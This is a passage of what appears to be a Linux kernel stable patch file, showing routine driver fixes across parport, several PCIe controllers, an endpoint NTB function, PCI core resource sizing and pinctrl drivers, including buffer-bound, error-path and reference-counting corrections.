+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -155,7 +155,7 @@ static int do_hardware_irq(struct ctl_table *table, int write,
+ 	if (write) /* permissions prevent this anyway */
+ 		return -EACCES;
+ 
+-	len += sprintf (buffer, "%d\n", port->irq);
++	len += snprintf (buffer, sizeof(buffer), "%d\n", port->irq);
+ 
+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -182,7 +182,7 @@ static int do_hardware_dma(struct ctl_table *table, int write,
+ 	if (write) /* permissions prevent this anyway */
+ 		return -EACCES;
+ 
+-	len += sprintf (buffer, "%d\n", port->dma);
++	len += snprintf (buffer, sizeof(buffer), "%d\n", port->dma);
+ 
+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -213,7 +213,7 @@ static int do_hardware_modes(struct ctl_table *table, int write,
+ #define printmode(x)							\
+ do {									\
+ 	if (port->modes & PARPORT_MODE_##x)				\
+-		len += sprintf(buffer + len, "%s%s", f++ ? "," : "", #x); \
++		len += snprintf(buffer + len, sizeof(buffer) - len, "%s%s", f++ ? "," : "", #x); \
+ } while (0)
+ 		int f = 0;
+ 		printmode(PCSPP);
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index 7ecad72cff7e7..6007ffcb4752a 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -247,8 +247,68 @@ static struct irq_chip ks_pcie_msi_irq_chip = {
+ 	.irq_unmask = ks_pcie_msi_unmask,
+ };
+ 
++/**
++ * ks_pcie_set_dbi_mode() - Set DBI mode to access overlaid BAR mask registers
++ * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
++ *	     PCIe host controller driver information.
++ *
++ * Since modification of dbi_cs2 involves different clock domain, read the
++ * status back to ensure the transition is complete.
++ */
++static void ks_pcie_set_dbi_mode(struct keystone_pcie *ks_pcie)
++{
++	u32 val;
++
++	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	val |= DBI_CS2;
++	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
++
++	do {
++		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	} while (!(val & DBI_CS2));
++}
++
++/**
++ * ks_pcie_clear_dbi_mode() - Disable DBI mode
++ * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
++ *	     PCIe host controller driver information.
++ *
++ * Since modification of dbi_cs2 involves different clock domain, read the
++ * status back to ensure the transition is complete.
++ */
++static void ks_pcie_clear_dbi_mode(struct keystone_pcie *ks_pcie)
++{
++	u32 val;
++
++	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	val &= ~DBI_CS2;
++	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
++
++	do {
++		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	} while (val & DBI_CS2);
++}
++
+ static int ks_pcie_msi_host_init(struct dw_pcie_rp *pp)
+ {
++	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
++	struct keystone_pcie *ks_pcie = to_keystone_pcie(pci);
++
++	/* Configure and set up BAR0 */
++	ks_pcie_set_dbi_mode(ks_pcie);
++
++	/* Enable BAR0 */
++	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, 1);
++	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, SZ_4K - 1);
++
++	ks_pcie_clear_dbi_mode(ks_pcie);
++
++	/*
++	 * For BAR0, just setting bus address for inbound writes (MSI) should
++	 * be sufficient.  Use physical address to avoid any conflicts.
++	 */
++	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, ks_pcie->app.start);
++
+ 	pp->msi_irq_chip = &ks_pcie_msi_irq_chip;
+ 	return dw_pcie_allocate_domains(pp);
+ }
+@@ -343,59 +403,22 @@ static const struct irq_domain_ops ks_pcie_legacy_irq_domain_ops = {
+ 	.xlate = irq_domain_xlate_onetwocell,
+ };
+ 
+-/**
+- * ks_pcie_set_dbi_mode() - Set DBI mode to access overlaid BAR mask registers
+- * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
+- *	     PCIe host controller driver information.
+- *
+- * Since modification of dbi_cs2 involves different clock domain, read the
+- * status back to ensure the transition is complete.
+- */
+-static void ks_pcie_set_dbi_mode(struct keystone_pcie *ks_pcie)
+-{
+-	u32 val;
+-
+-	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	val |= DBI_CS2;
+-	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
+-
+-	do {
+-		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	} while (!(val & DBI_CS2));
+-}
+-
+-/**
+- * ks_pcie_clear_dbi_mode() - Disable DBI mode
+- * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
+- *	     PCIe host controller driver information.
+- *
+- * Since modification of dbi_cs2 involves different clock domain, read the
+- * status back to ensure the transition is complete.
+- */
+-static void ks_pcie_clear_dbi_mode(struct keystone_pcie *ks_pcie)
+-{
+-	u32 val;
+-
+-	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	val &= ~DBI_CS2;
+-	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
+-
+-	do {
+-		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	} while (val & DBI_CS2);
+-}
+-
+-static void ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
++static int ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
+ {
+ 	u32 val;
+ 	u32 num_viewport = ks_pcie->num_viewport;
+ 	struct dw_pcie *pci = ks_pcie->pci;
+ 	struct dw_pcie_rp *pp = &pci->pp;
+-	u64 start, end;
++	struct resource_entry *entry;
+ 	struct resource *mem;
++	u64 start, end;
+ 	int i;
+ 
+-	mem = resource_list_first_type(&pp->bridge->windows, IORESOURCE_MEM)->res;
++	entry = resource_list_first_type(&pp->bridge->windows, IORESOURCE_MEM);
++	if (!entry)
++		return -ENODEV;
++
++	mem = entry->res;
+ 	start = mem->start;
+ 	end = mem->end;
+ 
+@@ -406,7 +429,7 @@ static void ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
+ 	ks_pcie_clear_dbi_mode(ks_pcie);
+ 
+ 	if (ks_pcie->is_am6)
+-		return;
++		return 0;
+ 
+ 	val = ilog2(OB_WIN_SIZE);
+ 	ks_pcie_app_writel(ks_pcie, OB_SIZE, val);
+@@ -423,6 +446,8 @@ static void ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
+ 	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+ 	val |= OB_XLAT_EN_VAL;
+ 	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
++
++	return 0;
+ }
+ 
+ static void __iomem *ks_pcie_other_map_bus(struct pci_bus *bus,
+@@ -448,44 +473,10 @@ static struct pci_ops ks_child_pcie_ops = {
+ 	.write = pci_generic_config_write,
+ };
+ 
+-/**
+- * ks_pcie_v3_65_add_bus() - keystone add_bus post initialization
+- * @bus: A pointer to the PCI bus structure.
+- *
+- * This sets BAR0 to enable inbound access for MSI_IRQ register
+- */
+-static int ks_pcie_v3_65_add_bus(struct pci_bus *bus)
+-{
+-	struct dw_pcie_rp *pp = bus->sysdata;
+-	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
+-	struct keystone_pcie *ks_pcie = to_keystone_pcie(pci);
+-
+-	if (!pci_is_root_bus(bus))
+-		return 0;
+-
+-	/* Configure and set up BAR0 */
+-	ks_pcie_set_dbi_mode(ks_pcie);
+-
+-	/* Enable BAR0 */
+-	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, 1);
+-	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, SZ_4K - 1);
+-
+-	ks_pcie_clear_dbi_mode(ks_pcie);
+-
+-	 /*
+-	  * For BAR0, just setting bus address for inbound writes (MSI) should
+-	  * be sufficient.  Use physical address to avoid any conflicts.
+-	  */
+-	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, ks_pcie->app.start);
+-
+-	return 0;
+-}
+-
+ static struct pci_ops ks_pcie_ops = {
+ 	.map_bus = dw_pcie_own_conf_map_bus,
+ 	.read = pci_generic_config_read,
+ 	.write = pci_generic_config_write,
+-	.add_bus = ks_pcie_v3_65_add_bus,
+ };
+ 
+ /**
+@@ -818,7 +809,10 @@ static int __init ks_pcie_host_init(struct dw_pcie_rp *pp)
+ 		return ret;
+ 
+ 	ks_pcie_stop_link(pci);
+-	ks_pcie_setup_rc_app_regs(ks_pcie);
++	ret = ks_pcie_setup_rc_app_regs(ks_pcie);
++	if (ret)
++		return ret;
++
+ 	writew(PCI_IO_RANGE_TYPE_32 | (PCI_IO_RANGE_TYPE_32 << 8),
+ 			pci->dbi_base + PCI_IO_BASE);
+ 
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 506d6d061d4cd..449ad709495d3 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -165,7 +165,7 @@ static int dw_pcie_ep_inbound_atu(struct dw_pcie_ep *ep, u8 func_no, int type,
+ 	if (!ep->bar_to_atu[bar])
+ 		free_win = find_first_zero_bit(ep->ib_window_map, pci->num_ib_windows);
+ 	else
+-		free_win = ep->bar_to_atu[bar];
++		free_win = ep->bar_to_atu[bar] - 1;
+ 
+ 	if (free_win >= pci->num_ib_windows) {
+ 		dev_err(pci->dev, "No free inbound window\n");
+@@ -179,7 +179,11 @@ static int dw_pcie_ep_inbound_atu(struct dw_pcie_ep *ep, u8 func_no, int type,
+ 		return ret;
+ 	}
+ 
+-	ep->bar_to_atu[bar] = free_win;
++	/*
++	 * Always increment free_win before assignment, since value 0 is used to identify
++	 * unallocated mapping.
++	 */
++	ep->bar_to_atu[bar] = free_win + 1;
+ 	set_bit(free_win, ep->ib_window_map);
+ 
+ 	return 0;
+@@ -216,7 +220,10 @@ static void dw_pcie_ep_clear_bar(struct pci_epc *epc, u8 func_no, u8 vfunc_no,
+ 	struct dw_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct dw_pcie *pci = to_dw_pcie_from_ep(ep);
+ 	enum pci_barno bar = epf_bar->barno;
+-	u32 atu_index = ep->bar_to_atu[bar];
++	u32 atu_index = ep->bar_to_atu[bar] - 1;
++
++	if (!ep->bar_to_atu[bar])
++		return;
+ 
+ 	__dw_pcie_ep_reset_bar(pci, func_no, bar, epf_bar->flags);
+ 
+diff --git a/drivers/pci/controller/dwc/pcie-dw-rockchip.c b/drivers/pci/controller/dwc/pcie-dw-rockchip.c
+index c1e7653e508e7..4332370fefa0e 100644
+--- a/drivers/pci/controller/dwc/pcie-dw-rockchip.c
++++ b/drivers/pci/controller/dwc/pcie-dw-rockchip.c
+@@ -240,7 +240,7 @@ static int rockchip_pcie_resource_get(struct platform_device *pdev,
+ 		return PTR_ERR(rockchip->apb_base);
+ 
+ 	rockchip->rst_gpio = devm_gpiod_get_optional(&pdev->dev, "reset",
+-						     GPIOD_OUT_HIGH);
++						     GPIOD_OUT_LOW);
+ 	if (IS_ERR(rockchip->rst_gpio))
+ 		return PTR_ERR(rockchip->rst_gpio);
+ 
+diff --git a/drivers/pci/controller/dwc/pcie-qcom-ep.c b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+index 1c7fd05ce0280..f2bf3eba2254e 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom-ep.c
++++ b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+@@ -446,12 +446,6 @@ static int qcom_pcie_perst_deassert(struct dw_pcie *pci)
+ static void qcom_pcie_perst_assert(struct dw_pcie *pci)
+ {
+ 	struct qcom_pcie_ep *pcie_ep = to_pcie_ep(pci);
+-	struct device *dev = pci->dev;
+-
+-	if (pcie_ep->link_status == QCOM_PCIE_EP_LINK_DISABLED) {
+-		dev_dbg(dev, "Link is already disabled\n");
+-		return;
+-	}
+ 
+ 	qcom_pcie_disable_resources(pcie_ep);
+ 	pcie_ep->link_status = QCOM_PCIE_EP_LINK_DISABLED;
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index b36cbc9136ae1..09491d06589ee 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -1092,8 +1092,8 @@ static void _hv_pcifront_read_config(struct hv_pci_dev *hpdev, int where,
+ 		   PCI_CAPABILITY_LIST) {
+ 		/* ROM BARs are unimplemented */
+ 		*val = 0;
+-	} else if (where >= PCI_INTERRUPT_LINE && where + size <=
+-		   PCI_INTERRUPT_PIN) {
++	} else if ((where >= PCI_INTERRUPT_LINE && where + size <= PCI_INTERRUPT_PIN) ||
++		   (where >= PCI_INTERRUPT_PIN && where + size <= PCI_MIN_GNT)) {
+ 		/*
+ 		 * Interrupt Line and Interrupt PIN are hard-wired to zero
+ 		 * because this front-end only supports message-signaled
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index a860f25473df6..76f125d556ebb 100644
+--- a/drivers/pci/controller/pci-loongson.c
++++ b/drivers/pci/controller/pci-loongson.c
+@@ -163,6 +163,19 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_HDMI, loongson_pci_pin_quirk);
+ 
++static void loongson_pci_msi_quirk(struct pci_dev *dev)
++{
++	u16 val, class = dev->class >> 8;
++
++	if (class != PCI_CLASS_BRIDGE_HOST)
++		return;
++
++	pci_read_config_word(dev, dev->msi_cap + PCI_MSI_FLAGS, &val);
++	val |= PCI_MSI_FLAGS_ENABLE;
++	pci_write_config_word(dev, dev->msi_cap + PCI_MSI_FLAGS, val);
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_LOONGSON, DEV_LS7A_PCIE_PORT5, loongson_pci_msi_quirk);
++
+ static struct loongson_pci *pci_bus_to_loongson_pci(struct pci_bus *bus)
+ {
+ 	struct pci_config_window *cfg;
+diff --git a/drivers/pci/controller/pcie-rcar-host.c b/drivers/pci/controller/pcie-rcar-host.c
+index e4faf90feaf5c..d0fe5076d9777 100644
+--- a/drivers/pci/controller/pcie-rcar-host.c
++++ b/drivers/pci/controller/pcie-rcar-host.c
+@@ -92,7 +92,11 @@ static int rcar_pcie_wakeup(struct device *pcie_dev, void __iomem *pcie_base)
+ 		writel(L1IATN, pcie_base + PMCTLR);
+ 		ret = readl_poll_timeout_atomic(pcie_base + PMSR, val,
+ 						val & L1FAEG, 10, 1000);
+-		WARN(ret, "Timeout waiting for L1 link state, ret=%d\n", ret);
++		if (ret) {
++			dev_warn_ratelimited(pcie_dev,
++					     "Timeout waiting for L1 link state, ret=%d\n",
++					     ret);
++		}
+ 		writel(L1FAEG | PMEL1RX, pcie_base + PMSR);
+ 	}
+ 
+diff --git a/drivers/pci/controller/pcie-rockchip.c b/drivers/pci/controller/pcie-rockchip.c
+index 1aa84035a8bc7..bdce1ba7c1bc0 100644
+--- a/drivers/pci/controller/pcie-rockchip.c
++++ b/drivers/pci/controller/pcie-rockchip.c
+@@ -120,7 +120,7 @@ int rockchip_pcie_parse_dt(struct rockchip_pcie *rockchip)
+ 
+ 	if (rockchip->is_rc) {
+ 		rockchip->ep_gpio = devm_gpiod_get_optional(dev, "ep",
+-							    GPIOD_OUT_HIGH);
++							    GPIOD_OUT_LOW);
+ 		if (IS_ERR(rockchip->ep_gpio))
+ 			return dev_err_probe(dev, PTR_ERR(rockchip->ep_gpio),
+ 					     "failed to get ep GPIO\n");
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index b4c1a4f6029d4..6708d2e789cb4 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -813,8 +813,9 @@ static int epf_ntb_epc_init(struct epf_ntb *ntb)
+  */
+ static void epf_ntb_epc_cleanup(struct epf_ntb *ntb)
+ {
+-	epf_ntb_db_bar_clear(ntb);
+ 	epf_ntb_mw_bar_clear(ntb, ntb->num_mws);
++	epf_ntb_db_bar_clear(ntb);
++	epf_ntb_config_sspad_bar_clear(ntb);
+ }
+ 
+ #define EPF_NTB_R(_name)						\
+@@ -1032,8 +1033,10 @@ static int vpci_scan_bus(void *sysdata)
+ 	struct epf_ntb *ndev = sysdata;
+ 
+ 	vpci_bus = pci_scan_bus(ndev->vbus_number, &vpci_ops, sysdata);
+-	if (vpci_bus)
+-		pr_err("create pci bus\n");
++	if (!vpci_bus) {
++		pr_err("create pci bus failed\n");
++		return -EINVAL;
++	}
+ 
+ 	pci_bus_add_devices(vpci_bus);
+ 
+@@ -1352,13 +1355,19 @@ static int epf_ntb_bind(struct pci_epf *epf)
+ 	ret = pci_register_driver(&vntb_pci_driver);
+ 	if (ret) {
+ 		dev_err(dev, "failure register vntb pci driver\n");
+-		goto err_bar_alloc;
++		goto err_epc_cleanup;
+ 	}
+ 
+-	vpci_scan_bus(ntb);
++	ret = vpci_scan_bus(ntb);
++	if (ret)
++		goto err_unregister;
+ 
+ 	return 0;
+ 
++err_unregister:
++	pci_unregister_driver(&vntb_pci_driver);
++err_epc_cleanup:
++	epf_ntb_epc_cleanup(ntb);
+ err_bar_alloc:
+ 	epf_ntb_config_spad_bar_free(ntb);
+ 
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 0399204941dbe..2d373ab3ccb38 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -5007,7 +5007,7 @@ static int pci_bus_max_d3cold_delay(const struct pci_bus *bus)
+ int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
+ 				      int timeout)
+ {
+-	struct pci_dev *child;
++	struct pci_dev *child __free(pci_dev_put) = NULL;
+ 	int delay;
+ 
+ 	if (pci_dev_is_disconnected(dev))
+@@ -5036,8 +5036,8 @@ int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
+ 		return 0;
+ 	}
+ 
+-	child = list_first_entry(&dev->subordinate->devices, struct pci_dev,
+-				 bus_list);
++	child = pci_dev_get(list_first_entry(&dev->subordinate->devices,
++					     struct pci_dev, bus_list));
+ 	up_read(&pci_bus_sem);
+ 
+ 	/*
+diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c
+index c690572b10ce7..b8cb990044fb2 100644
+--- a/drivers/pci/setup-bus.c
++++ b/drivers/pci/setup-bus.c
+@@ -824,11 +824,9 @@ static resource_size_t calculate_memsize(resource_size_t size,
+ 		size = min_size;
+ 	if (old_size == 1)
+ 		old_size = 0;
+-	if (size < old_size)
+-		size = old_size;
+ 
+-	size = ALIGN(max(size, add_size) + children_add_size, align);
+-	return size;
++	size = max(size, add_size) + children_add_size;
++	return ALIGN(max(size, old_size), align);
+ }
+ 
+ resource_size_t __weak pcibios_window_alignment(struct pci_bus *bus,
+diff --git a/drivers/phy/cadence/phy-cadence-torrent.c b/drivers/phy/cadence/phy-cadence-torrent.c
+index f099053c583c0..34a380ce533a1 100644
+--- a/drivers/phy/cadence/phy-cadence-torrent.c
++++ b/drivers/phy/cadence/phy-cadence-torrent.c
+@@ -1087,6 +1087,9 @@ static int cdns_torrent_dp_set_power_state(struct cdns_torrent_phy *cdns_phy,
+ 	ret = regmap_read_poll_timeout(regmap, PHY_PMA_XCVR_POWER_STATE_ACK,
+ 				       read_val, (read_val & mask) == value, 0,
+ 				       POLL_TIMEOUT_US);
++	if (ret)
++		return ret;
++
+ 	cdns_torrent_dp_write(regmap, PHY_PMA_XCVR_POWER_STATE_REQ, 0x00000000);
+ 	ndelay(100);
+ 
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index db5fc55a5c964..3b6051d632181 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -2062,6 +2062,14 @@ pinctrl_init_controller(struct pinctrl_desc *pctldesc, struct device *dev,
+ 	return ERR_PTR(ret);
+ }
+ 
++static void pinctrl_uninit_controller(struct pinctrl_dev *pctldev, struct pinctrl_desc *pctldesc)
++{
++	pinctrl_free_pindescs(pctldev, pctldesc->pins,
++			      pctldesc->npins);
++	mutex_destroy(&pctldev->mutex);
++	kfree(pctldev);
++}
++
+ static int pinctrl_claim_hogs(struct pinctrl_dev *pctldev)
+ {
+ 	pctldev->p = create_pinctrl(pctldev->dev, pctldev);
+@@ -2142,8 +2150,10 @@ struct pinctrl_dev *pinctrl_register(struct pinctrl_desc *pctldesc,
+ 		return pctldev;
+ 
+ 	error = pinctrl_enable(pctldev);
+-	if (error)
++	if (error) {
++		pinctrl_uninit_controller(pctldev, pctldesc);
+ 		return ERR_PTR(error);
++	}
+ 
+ 	return pctldev;
+ }
+diff --git a/drivers/pinctrl/freescale/pinctrl-mxs.c b/drivers/pinctrl/freescale/pinctrl-mxs.c
+index 735cedd0958a2..5b0fcf15f2804 100644
+--- a/drivers/pinctrl/freescale/pinctrl-mxs.c
++++ b/drivers/pinctrl/freescale/pinctrl-mxs.c
+@@ -405,8 +405,8 @@ static int mxs_pinctrl_probe_dt(struct platform_device *pdev,
+ 	int ret;
+ 	u32 val;
+ 
+-	child = of_get_next_child(np, NULL);
+-	if (!child) {
++	val = of_get_child_count(np);
++	if (val == 0) {
+ 		dev_err(&pdev->dev, "no group is defined\n");
+ 		return -ENOENT;
+ 	}
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index d26682f21ad1e..6d140a60888c2 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -916,9 +916,8 @@ static struct rockchip_mux_route_data rk3308_mux_route_data[] = {
+ 	RK_MUXROUTE_SAME(0, RK_PC3, 1, 0x314, BIT(16 + 0) | BIT(0)), /* rtc_clk */
+ 	RK_MUXROUTE_SAME(1, RK_PC6, 2, 0x314, BIT(16 + 2) | BIT(16 + 3)), /* uart2_rxm0 */
+ 	RK_MUXROUTE_SAME(4, RK_PD2, 2, 0x314, BIT(16 + 2) | BIT(16 + 3) | BIT(2)), /* uart2_rxm1 */
+-	RK_MUXROUTE_SAME(0, RK_PB7, 2, 0x608, BIT(16 + 8) | BIT(16 + 9)), /* i2c3_sdam0 */
+-	RK_MUXROUTE_SAME(3, RK_PB4, 2, 0x608, BIT(16 + 8) | BIT(16 + 9) | BIT(8)), /* i2c3_sdam1 */
+-	RK_MUXROUTE_SAME(2, RK_PA0, 3, 0x608, BIT(16 + 8) | BIT(16 + 9) | BIT(9)), /* i2c3_sdam2 */
++	RK_MUXROUTE_SAME(0, RK_PB7, 2, 0x314, BIT(16 + 4)), /* i2c3_sdam0 */
++	RK_MUXROUTE_SAME(3, RK_PB4, 2, 0x314, BIT(16 + 4) | BIT(4)), /* i2c3_sdam1 */
+ 	RK_MUXROUTE_SAME(1, RK_PA3, 2, 0x308, BIT(16 + 3)), /* i2s-8ch-1-sclktxm0 */
+ 	RK_MUXROUTE_SAME(1, RK_PA4, 2, 0x308, BIT(16 + 3)), /* i2s-8ch-1-sclkrxm0 */
+ 	RK_MUXROUTE_SAME(1, RK_PB5, 2, 0x308, BIT(16 + 3) | BIT(3)), /* i2s-8ch-1-sclktxm1 */
+@@ -927,18 +926,6 @@ static struct rockchip_mux_route_data rk3308_mux_route_data[] = {
+ 	RK_MUXROUTE_SAME(1, RK_PB6, 4, 0x308, BIT(16 + 12) | BIT(16 + 13) | BIT(12)), /* pdm-clkm1 */
+ 	RK_MUXROUTE_SAME(2, RK_PA6, 2, 0x308, BIT(16 + 12) | BIT(16 + 13) | BIT(13)), /* pdm-clkm2 */
+ 	RK_MUXROUTE_SAME(2, RK_PA4, 3, 0x600, BIT(16 + 2) | BIT(2)), /* pdm-clkm-m2 */
+-	RK_MUXROUTE_SAME(3, RK_PB2, 3, 0x314, BIT(16 + 9)), /* spi1_miso */
+-	RK_MUXROUTE_SAME(2, RK_PA4, 2, 0x314, BIT(16 + 9) | BIT(9)), /* spi1_miso_m1 */
+-	RK_MUXROUTE_SAME(0, RK_PB3, 3, 0x314, BIT(16 + 10) | BIT(16 + 11)), /* owire_m0 */
+-	RK_MUXROUTE_SAME(1, RK_PC6, 7, 0x314, BIT(16 + 10) | BIT(16 + 11) | BIT(10)), /* owire_m1 */
+-	RK_MUXROUTE_SAME(2, RK_PA2, 5, 0x314, BIT(16 + 10) | BIT(16 + 11) | BIT(11)), /* owire_m2 */
+-	RK_MUXROUTE_SAME(0, RK_PB3, 2, 0x314, BIT(16 + 12) | BIT(16 + 13)), /* can_rxd_m0 */
+-	RK_MUXROUTE_SAME(1, RK_PC6, 5, 0x314, BIT(16 + 12) | BIT(16 + 13) | BIT(12)), /* can_rxd_m1 */
+-	RK_MUXROUTE_SAME(2, RK_PA2, 4, 0x314, BIT(16 + 12) | BIT(16 + 13) | BIT(13)), /* can_rxd_m2 */
+-	RK_MUXROUTE_SAME(1, RK_PC4, 3, 0x314, BIT(16 + 14)), /* mac_rxd0_m0 */
+-	RK_MUXROUTE_SAME(4, RK_PA2, 2, 0x314, BIT(16 + 14) | BIT(14)), /* mac_rxd0_m1 */
+-	RK_MUXROUTE_SAME(3, RK_PB4, 4, 0x314, BIT(16 + 15)), /* uart3_rx */
+-	RK_MUXROUTE_SAME(0, RK_PC1, 3, 0x314, BIT(16 + 15) | BIT(15)), /* uart3_rx_m1 */
+ };
+ 
+ static struct rockchip_mux_route_data rk3328_mux_route_data[] = {
+diff --git a/drivers/pinctrl/pinctrl-single.c b/drivers/pinctrl/pinctrl-single.c
+index 9ad8f70206142..cd23479f352a2 100644
+--- a/drivers/pinctrl/pinctrl-single.c
++++ b/drivers/pinctrl/pinctrl-single.c
+@@ -1328,7 +1328,6 @@ static void pcs_irq_free(struct pcs_device *pcs)
+ static void pcs_free_resources(struct pcs_device *pcs)
+ {
+ 	pcs_irq_free(pcs);
+-	pinctrl_unregister(pcs->pctl);
+ 
+ #if IS_BUILTIN(CONFIG_PINCTRL_SINGLE)
+ 	if (pcs->missing_nr_pinctrl_cells)
+@@ -1885,7 +1884,7 @@ static int pcs_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto free;
+ 
+-	ret = pinctrl_register_and_init(&pcs->desc, pcs->dev, pcs, &pcs->pctl);
++	ret = devm_pinctrl_register_and_init(pcs->dev, &pcs->desc, pcs, &pcs->pctl);
+ 	if (ret) {
+ 		dev_err(pcs->dev, "could not register single pinctrl driver\n");
+ 		goto free;
+@@ -1918,8 +1917,10 @@ static int pcs_probe(struct platform_device *pdev)
+ 
+ 	dev_info(pcs->dev, "%i pins, size %u\n", pcs->desc.npins, pcs->size);
+ 
+-	return pinctrl_enable(pcs->pctl);
++	if (pinctrl_enable(pcs->pctl))
++		goto free;
+ 
++	return 0;
+ free:
+ 	pcs_free_resources(pcs);
+ 
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index acf7664ea835b..595a5a4b02ecb 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -62,20 +62,20 @@
+ #define GPSR0_9		F_(MSIOF5_SYNC,		IP1SR0_7_4)
+ #define GPSR0_8		F_(MSIOF5_SS1,		IP1SR0_3_0)
+ #define GPSR0_7		F_(MSIOF5_SS2,		IP0SR0_31_28)
+-#define GPSR0_6		F_(IRQ0,		IP0SR0_27_24)
+-#define GPSR0_5		F_(IRQ1,		IP0SR0_23_20)
+-#define GPSR0_4		F_(IRQ2,		IP0SR0_19_16)
+-#define GPSR0_3		F_(IRQ3,		IP0SR0_15_12)
++#define GPSR0_6		F_(IRQ0_A,		IP0SR0_27_24)
++#define GPSR0_5		F_(IRQ1_A,		IP0SR0_23_20)
++#define GPSR0_4		F_(IRQ2_A,		IP0SR0_19_16)
++#define GPSR0_3		F_(IRQ3_A,		IP0SR0_15_12)
+ #define GPSR0_2		F_(GP0_02,		IP0SR0_11_8)
+ #define GPSR0_1		F_(GP0_01,		IP0SR0_7_4)
+ #define GPSR0_0		F_(GP0_00,		IP0SR0_3_0)
+ 
+ /* GPSR1 */
+-#define GPSR1_28	F_(HTX3,		IP3SR1_19_16)
+-#define GPSR1_27	F_(HCTS3_N,		IP3SR1_15_12)
+-#define GPSR1_26	F_(HRTS3_N,		IP3SR1_11_8)
+-#define GPSR1_25	F_(HSCK3,		IP3SR1_7_4)
+-#define GPSR1_24	F_(HRX3,		IP3SR1_3_0)
++#define GPSR1_28	F_(HTX3_A,		IP3SR1_19_16)
++#define GPSR1_27	F_(HCTS3_N_A,		IP3SR1_15_12)
++#define GPSR1_26	F_(HRTS3_N_A,		IP3SR1_11_8)
++#define GPSR1_25	F_(HSCK3_A,		IP3SR1_7_4)
++#define GPSR1_24	F_(HRX3_A,		IP3SR1_3_0)
+ #define GPSR1_23	F_(GP1_23,		IP2SR1_31_28)
+ #define GPSR1_22	F_(AUDIO_CLKIN,		IP2SR1_27_24)
+ #define GPSR1_21	F_(AUDIO_CLKOUT,	IP2SR1_23_20)
+@@ -113,14 +113,14 @@
+ #define GPSR2_11	F_(CANFD0_RX,		IP1SR2_15_12)
+ #define GPSR2_10	F_(CANFD0_TX,		IP1SR2_11_8)
+ #define GPSR2_9		F_(CAN_CLK,		IP1SR2_7_4)
